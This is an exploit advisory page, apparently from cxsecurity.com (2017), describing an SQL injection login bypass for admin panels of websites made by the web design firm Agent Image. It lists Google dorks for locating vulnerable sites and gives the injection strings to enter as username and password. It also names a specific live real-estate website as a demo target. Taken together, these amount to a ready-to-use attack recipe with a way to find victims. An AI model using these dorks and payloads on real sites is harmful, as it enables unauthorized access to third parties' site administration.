Agent Image Admin Login bypass

2017.09.28
Credit: r4j4z
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] exploit title : Agent Image Admin Login bypass [+] Dork 1 : intext:"Design by Agent Image" inurl:ID= [+] Dork 2 : inurl:request_appt.php?id= [+] Vendor Homepage: https://www.agentimage.com [+] Category: Webapps [+] Tested on: WiN7_x64 [+] Exploit Author: r4j4z [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Proof of Concept [+] find target [+] Enter username and password with [+] username : '=' 'or' [+] password : '=' 'or' [+] Admin Address : admin [+] Demo : https://www.lisavancerealestate.com/admin [+] [+] [+] [+] [+] [+] [+] [+] persiansecurity [R4j4z] [+] [+] [+] [+] [+] [+][+][+][+][+][+][+][+][+][+][+][+][+]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top